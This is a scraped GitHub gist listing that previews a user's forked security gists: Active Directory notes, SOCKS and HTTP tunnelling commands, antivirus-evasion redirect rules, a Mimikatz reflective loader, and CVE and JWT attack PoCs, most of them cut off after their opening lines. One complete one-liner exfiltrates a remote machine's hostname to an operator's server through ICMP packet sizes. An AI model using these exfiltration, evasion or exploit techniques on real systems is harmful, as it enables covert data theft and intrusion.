- NetBIOS name should match your forest FQDN. So if
FQDN=adlunches.net, NetBIOS name isADLUNCHES - Every AD forest has a server which indexes all the objects in the forest. This is known as the Global Catalog server.
- Each domain needs at least 1 GC server, can have more for redundancy. This is so it can find objects in other domains.
- Any DC can be GC.
- By default all DCs will be GCs. GCs take up disk space and bandwidth, but both are plentiful.
- Microsoft Exchange requires GC server to run.
- Allow logins via UPN eg. [email protected], which may be on same domain.
- GC servers should be deployed at sites with poor WAN links or filtered connections.
filipesam
filipesam
/ AD notes.md
Created
February 22, 2022 10:50
— forked from ivanitlearning/AD notes.md
Some notes I took while learning about Active Directory
filipesam
/ plink_socks_proxy.bat
Created
January 24, 2022 09:04
— forked from moshekaplan/plink_socks_proxy.bat
plink SOCKS proxy short guide
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :: plink from here: http://the.earth.li/~sgtatham/putty/latest/x86/plink.exe | |
| :: Guide available here: http://blog.buttewifi.com/2010/01/dynamic-ssh-tunneling-with-putty-to-secure-web-traffic/ | |
| :: Connects to 192.168.1.2 on port 5900. Sets up a SOCKS proxy that listens on 127.0.0.1 port 9876 and forwards all connections through the connection to 192.168.1.2. | |
| :: You then need to configure your system to use 127.0.0.1:9876 as a SOCKS proxy. | |
| putty\PLINK.EXE 192.168.1.2 -P 5900 -D 127.0.0.1:9876 -N | |
| :: Gotcha: In Windows, you need to specifically enable it as a SOCKS proxy, and disable all other proxies. |
filipesam
/ gist:ac0dc1bc69be959d9489b67264a449e7
Created
January 16, 2022 17:48
— forked from chtz/gist:b3f3e0e764a75ee4f41e0e7da922c39d
SSH over HTTP tunnel (hts- & htc Sample)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Client (Cygwin) | |
| lynx -source rawgit.com/transcode-open/apt-cyg/master/apt-cyg > apt-cyg | |
| install apt-cyg /bin | |
| apt-cyg install httptunnel | |
| htc -P $CORP_HTTP_PROXY_HOST:$CORP_HTTP_PROXY_PORT -F 8888 $HTS_SERVER_HOST:80 | |
| ssh -p 8888 $USER@localhost |
filipesam
/ CSM_pocs.md
Created
January 13, 2022 11:32
— forked from Frycos/CSM_pocs.md
Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.
Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.
filipesam
/ .htaccess
Created
January 7, 2022 12:19
— forked from Meatballs1/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Define REDIR_TARGET example.com | |
| RewriteEngine On | |
| RewriteOptions Inherit | |
| # Uncomment the below line for verbose logging, including seeing which rule matched. | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
filipesam
/ .htaccess
Created
January 7, 2022 11:58
— forked from curi0usJack/.htaccess
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
| # | |
| # Note this version requires Apache 2.4+ | |
| # | |
| # Save this file into something like /etc/apache2/redirect.rules. | |
| # Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
| # | |
| # Include /etc/apache2/redirect.rules | |
| # |
filipesam
/ PELoader.cs
Created
October 11, 2021 21:20
— forked from xorrior/PELoader.cs
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.IO.Compression; | |
| using System.Text; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
filipesam
/ icmp.md
Created
September 27, 2021 11:10
— forked from jobertabma/icmp.md
Commands to exfiltrate command output via ICMP packet size
- Capture ICMP packets on your server:
tcpdump -nni eth0 -e icmp[icmptype] == 8 -w output.cap
- Send ICMP packets to your server with each byte stored in the packet size, execute this on the remote machine:
ip=vm03;output=`hostname`;for ((i=0;i<${#output};i++));do; ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done
filipesam
/ PoC_CVE-2021-28482.py
Created
May 4, 2021 08:54
— forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| import sys | |
| from base64 import b64encode | |
| from requests_ntlm2 import HttpNtlmAuth | |
| from urllib3.exceptions import InsecureRequestWarning | |
| from urllib import quote_plus | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
filipesam
/ jwt_rs256_as_hs256.py
Created
March 9, 2021 23:27
— forked from aayla-secura/jwt_rs256_as_hs256.py
JWT RS256 to HS256 re-signing attack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| ############################################################# | |
| # @AaylaSecura1138, github.com/aayla-secura | |
| # Modify and distribute as you wish | |
| ############################################################# | |
| # NO LONGER MAINTAINED: CURRENT CODE LIVES HERE: | |
| # https://github.com/aurainfosec/jwt_resign_asym_to_sym | |
| ############################################################# | |
| # Some JWT libraries are vulnerable to a known attack which changes | |
| # the type of a JWT from an asymmetric (e.g. RS256) to a symmetric |